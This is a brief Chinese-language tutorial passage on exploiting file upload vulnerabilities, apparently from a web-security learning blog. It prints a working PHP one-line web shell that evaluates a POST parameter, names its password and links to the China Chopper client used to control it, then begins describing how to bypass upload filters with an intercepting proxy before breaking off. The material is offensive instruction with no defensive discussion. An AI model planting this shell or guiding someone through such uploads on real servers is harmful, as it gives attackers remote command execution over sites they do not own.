{{docContent.title}}

文件上传漏洞

我们很多攻击都会集中在下面这个应用里面

我们利用文件上传漏洞来上传程序文件

无论你上传什么文件都可以

我们上传一段sheel脚本

<?php @eval($_POST['caidao']);?>

caidao是密码

然后下载中国菜刀
https://github.com/raddyfiy/caidao-official-version

这里设置一下路径

然后这里就可以执行各种操作了~~~

通过这个我们就可以拿到web sheel了

下面我们提高难度

这时我们就不能直接上次文件了

那么我们应该怎么办呢?使用新软件(使用代理拦截软件)

给火狐浏览器设置一下代理

软件长下面这个样子